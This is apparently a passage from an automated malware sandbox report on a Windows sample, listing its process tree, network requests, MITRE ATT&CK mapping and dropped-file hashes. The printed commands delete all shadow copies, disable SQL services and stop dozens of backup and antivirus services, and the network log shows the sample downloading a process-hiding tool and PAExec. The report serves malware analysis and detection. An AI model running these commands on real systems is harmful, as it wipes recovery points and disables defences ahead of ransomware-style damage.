    PID:5608
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:3904
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3908
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4340
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:768
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:516
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4744
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3276
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3204
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1648
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:3688
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:352
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5076
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1788
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2852
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4796
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:312
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:560
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:4836
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:4104
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:4868
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:4900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:3752
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:3404
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:4752
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:4612
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2696
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:320
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:3248
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:1948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:2880
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:2872
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:1796
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:2360
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:2156
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:1512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:1976
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:4860
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:3760
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:4136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:3368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2016
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:3352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:4640
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:1572
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4708
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:1804
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:3164
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:2348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:3912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:2364
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:4604
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:1624
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:2412
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:2416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:6280

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:6592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
1⤵
PID:6664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
1⤵
PID:6864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:6856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:6848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:7004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:7072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
1⤵
PID:7064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:7056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:7048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:6992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:6984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:6976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:6940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:6916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
1⤵
PID:6908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:6896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:6884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:6840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:6832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:6824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:6816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
1⤵
PID:6784

C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
1⤵
- Runs ping.exe
PID:6868

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
1⤵
PID:5624

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:6776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
1⤵
PID:6764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:6756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:6736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
1⤵
PID:6688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:6680

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
1⤵
PID:6672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:6584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
1⤵
PID:6560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:6500

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:6492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:6484

Network

DNS

raw.githubusercontent.com

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.111.133
GET

https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

185.199.108.133:443

Request

GET /d35ha/ProcessHide/master/bins/ProcessHide64.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 141478
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "3bc3d78bc68a5b7b2573b11d0715f13a64eb42781d6a05c2f3015bf90df87dbc"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 4CFC:170FA:1FB26B0:211B8E0:659FF42E
Accept-Ranges: bytes
Date: Thu, 11 Jan 2024 13:59:15 GMT
Via: 1.1 varnish
X-Served-By: cache-lhr7378-LHR
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1704981556.547049,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 7126627522cbd537f693166518c9c501239902a1
Expires: Thu, 11 Jan 2024 14:04:15 GMT
Source-Age: 4
DNS

133.108.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.108.199.185.in-addr.arpa

IN PTR

Response

133.108.199.185.in-addr.arpa

IN PTR

cdn-185-199-108-133githubcom
DNS

www.google.com

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.200.4
GET

https://www.google.com/

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

142.250.200.4:443

Request

GET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 11 Jan 2024 13:59:21 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-BXeR2IM42DDy5jpZXUuSmA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: SOCS=CAAaBgiA3_ysBg; expires=Sun, 09-Feb-2025 13:59:21 GMT; path=/; domain=.google.com; Secure; SameSite=lax
Set-Cookie: AEC=Ae3NU9MEmYPnBq9sxKEaJsBW35l--i_dhvbS3Dxii4I-KqxdqQc0RWFW-g; expires=Tue, 09-Jul-2024 13:59:21 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: __Secure-ENID=17.SE=Os7TuV_7KRPa8OmzACcB_7xA-tXX8X-hU21pqCWAmp1v29yTJX1_0gXfZCxKq7oHE9sYpbqCUb2KhJ5NiPnLzmox0fNK-paMSh_K2sLXg9g9diSW7t3jq3n-49FG5Q4JltLuAQwcTaL2TT9M6mCtjpl51HzQEZ5xId3tTJv9WQk; expires=Mon, 10-Feb-2025 06:17:39 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: CONSENT=PENDING+027; expires=Sat, 10-Jan-2026 13:59:21 GMT; path=/; domain=.google.com; Secure
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
DNS

www.poweradmin.com

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

8.8.8.8:53

Request

www.poweradmin.com

IN A

Response

www.poweradmin.com

IN CNAME

poweradmin.com

poweradmin.com

IN A

52.1.55.52
DNS

www.poweradmin.com

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

8.8.8.8:53

Request

www.poweradmin.com

IN A
DNS

4.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

4.200.250.142.in-addr.arpa

IN PTR

Response

4.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f41e100net
GET

https://www.poweradmin.com/paexec/paexec.exe

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

52.1.55.52:443

Request

GET /paexec/paexec.exe HTTP/1.1
Host: www.poweradmin.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Type: application/octet-stream
Last-Modified: Thu, 15 Apr 2021 21:21:55 GMT
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: *.typekit.net *.poweradmin.com *.visualwebsiteoptimizer.com *.sitesearch360.com *.google.com *.googleadservices.com *.google-analytics.com *.googleusercontent.com *.googletagmanager.com *.googleapis.com *.gstatic.com *.doubleclick.net *.livechatinc.com *.authorize.net *.reddit.com *.redditstatic.com *.youtube.com *.capterra.com *.bing.com; frame-ancestors 'self' *.poweradmin.com *.authorize.net;
X-Xss-Protection: 1;
Date: Thu, 11 Jan 2024 13:59:23 GMT
Content-Length: 224560
DNS

52.55.1.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.55.1.52.in-addr.arpa

IN PTR

Response

52.55.1.52.in-addr.arpa

IN PTR

ec2-52-1-55-52 compute-1 amazonawscom
DNS

52.55.1.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

52.55.1.52.in-addr.arpa

IN PTR
DNS

255.0.127.10.in-addr.arpa

Remote address:

8.8.8.8:53

Request

255.0.127.10.in-addr.arpa

IN PTR

Response
DNS

cutewallpaper.org

mshta.exe

Remote address:

8.8.8.8:53

Request

cutewallpaper.org

IN A

Response

cutewallpaper.org

IN A

104.21.37.179

cutewallpaper.org

IN A

172.67.211.67
GET

https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg

mshta.exe

Remote address:

104.21.37.179:443

Request

GET /21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: cutewallpaper.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 11 Jan 2024 13:59:35 GMT
Content-Type: image/jpeg
Content-Length: 42487
Connection: keep-alive
Last-Modified: Sun, 24 Nov 2019 02:50:03 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Juw7jhzd0dgqp%2FAirdJDOxRa5IeoZeSVu6XX743MyhGUkIXGCFbEC%2F9TYlxFChpSjbjsUqPaCJxIbCRxIEFSDnMOL2jSObsBt7f9OWc4Y6dEp1687Knzs0jIJciZt%2BFwwavj5g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 843dae5fcddd23d0-LHR
alt-svc: h3=":443"; ma=86400
DNS

179.37.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

179.37.21.104.in-addr.arpa

IN PTR

Response
DNS

173.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

173.178.17.96.in-addr.arpa

IN PTR

Response

173.178.17.96.in-addr.arpa

IN PTR

a96-17-178-173deploystaticakamaitechnologiescom
DNS

3.200.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.200.250.142.in-addr.arpa

IN PTR

Response

3.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f31e100net
DNS

48.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

48.229.111.52.in-addr.arpa

IN PTR

Response
DNS

11.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.173.189.20.in-addr.arpa

IN PTR

Response

185.199.108.133:443

https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe

tls, http

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

4.7kB
150.9kB
84
114

HTTP Request

GET https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe

HTTP Response

200
142.250.200.4:443

https://www.google.com/

tls, http

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

2.6kB
60.8kB
44
51

HTTP Request

GET https://www.google.com/

HTTP Response

200
52.1.55.52:443

https://www.poweradmin.com/paexec/paexec.exe

tls, http

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

4.7kB
235.9kB
92
172

HTTP Request

GET https://www.poweradmin.com/paexec/paexec.exe

HTTP Response

200
104.21.37.179:443

https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg

tls, http

mshta.exe

3.1kB
51.4kB
52
48

HTTP Request

GET https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg

HTTP Response

200

8.8.8.8:53

raw.githubusercontent.com

dns

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.108.133

185.199.109.133

185.199.110.133

185.199.111.133
8.8.8.8:53

133.108.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.108.199.185.in-addr.arpa
8.8.8.8:53

www.google.com

dns

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.200.4
8.8.8.8:53

www.poweradmin.com

dns

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

128 B
94 B
2
1

DNS Request

www.poweradmin.com

DNS Request

www.poweradmin.com

DNS Response

52.1.55.52
8.8.8.8:53

4.200.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

4.200.250.142.in-addr.arpa
8.8.8.8:53

52.55.1.52.in-addr.arpa

dns

138 B
121 B
2
1

DNS Request

52.55.1.52.in-addr.arpa

DNS Request

52.55.1.52.in-addr.arpa
10.127.255.255:3

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

130 B
1
10.127.0.255:3

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

130 B
1
8.8.8.8:53

255.0.127.10.in-addr.arpa

dns

71 B
71 B
1
1

DNS Request

255.0.127.10.in-addr.arpa
8.8.8.8:53

cutewallpaper.org

dns

mshta.exe

63 B
95 B
1
1

DNS Request

cutewallpaper.org

DNS Response

104.21.37.179

172.67.211.67
8.8.8.8:53

179.37.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

179.37.21.104.in-addr.arpa
8.8.8.8:53

173.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

173.178.17.96.in-addr.arpa
8.8.8.8:53

3.200.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

3.200.250.142.in-addr.arpa
8.8.8.8:53

48.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

48.229.111.52.in-addr.arpa
8.8.8.8:53

11.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

11.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
af87552b88c6e6699e53975f0597c18e

SHA1
07ad022462be044df0b745e5931568041870a5f0

SHA256
990bac0d73fe61d8fbedcdb6a3a4087f16d830960fba91c8e0351b3eb75f522f

SHA512
7b960216398c0a6ac2dc0f2214130924232f9e2650059ff303d3771ed8fe81bc2652b0c29905dfde32ec36fdc60886773d56ddf13b1ead816b858723cda2a908

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
804b8adb96e185fdfbfd96b4d79db00b

SHA1
1a85fb9a4490e9c1802ff6e8463f3658a3153cc5

SHA256
2aff5741283f5291740020a696a09da2bf795d7e4e0b61ec6fbb3e5f64f7cbf0

SHA512
f695026c0c0576facdb0b575a83105e43bb0a63b4aeddfd01a0c624d5d74ab8034ae7b287494c3eac7299eb8f0b17bc9158895ad50b4e31d3bc29f9cc54ae316

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f464c796b37b0791cfb9b33e8f8c6721

SHA1
9b83210cdef70d44976093396c0395e40c6312a0

SHA256
5cbf695ae61558e7443f191794fc8194668fc0b52a4d9a5a1342167bdcaa592c

SHA512
0668f2053a8a8f02ecfd0397aefe919e7282f2368c16f70941f9044e9b03288444eb7086e28cc82a8aa35910bd437323de3ec551b34730a635df2c40510a06d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
96a838fb03bf931eb1166c16bf871604

SHA1
b123024c0f16eef351220af4d9a36092ab2613fe

SHA256
08c3d18bbaaacc52143ffd0319cf2eb3aba330dbe62f15751d366a27d025564d

SHA512
3362aab24d6aeb072642825b4b3207ddfe09e5d40dc87749980d94c06ca3383090667c659a3c535e038f1fd6cc3cea6b36030c62b8c726d164b6ec4bafe404c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
69b5f859e4b7bd02b2524f653e6f3c06

SHA1
6da3c0f1f003059d2ade6791fbc605e0a999e3de

SHA256
4bbbc0e353f063e2714ca2574ebe3fe3454aea470b841f2ba5d1730b4dcbe53c

SHA512
20caa879707d9c6b21b80dffb1d55f7edf817fae4826ed249ceade20c8699ef0f260765c6ede691251138558d49a71fe72313c60d3d2b72761cd5c1fc14055df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
83d99bee066b7fe0ed4f532bfefde86b

SHA1
0ee1cf82ca47fe79718496314a6d81f8617563d5

SHA256
d7e6fe5e887f3975c706deb083cac3d16d2ed8b202fcdc3312e3ffd6e400e347

SHA512
bc7e0bd3ca8c71f722fefd33206185b50b92fd6a01c773f9b8ed576b03c72b93ef0bf02722cedba8f521b61528a64af3d57d677bef254e7b43b5028ecee57319

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
58070c6812a27e48620602dae62db710

SHA1
39dd8d03932687b0396693f1a8bde46924a44fe7

SHA256
7ca8515294cca49c9dd4d4d787483ddbb0ba1518f1d2236f2feccd338c120113

SHA512
6cb49622f2ba1f757738848381f553da5969b6081062ed35828dda4e121821da125624e0cafc1d61bb03581852bf4856d1c9c1afd759d845f86b44754431bb7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
43ffa819f94c6c60119cd3201e0e79b9

SHA1
873354a116698fe0cf4b37a484f835aaa9d97e9c

SHA256
453bc17ce2c0ed6849fc97c0c07c523cf5e4b0c033e760bcd72aa79e5117fc09

SHA512
63ea127bdb980beccb2eedddfad81375c85abe998ca000172c2e9682e56d8705b78111fff53b9126ec43644d39a70624c9c6bcfcf3602a9c8e9b965eb342ba3b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
05549567ae2099c665c75d0933ddcb48

SHA1
f5ae6413eb6f1e2f2d83b43b8d9a2a50cbf457a0

SHA256
9f3979e954fa38bf330544dfd68d9612c920c8d3daa7b570b27abb59b2da7d26

SHA512
f5a24cd3fe75f23e7a67c42b87a17df72409d207b07dfe012ca71e6a80eac80d4b4dc5fb87657ddc80428c06c1b9bd5953c3ef84150abc0d105bc196d9d5d04f

Download Submit
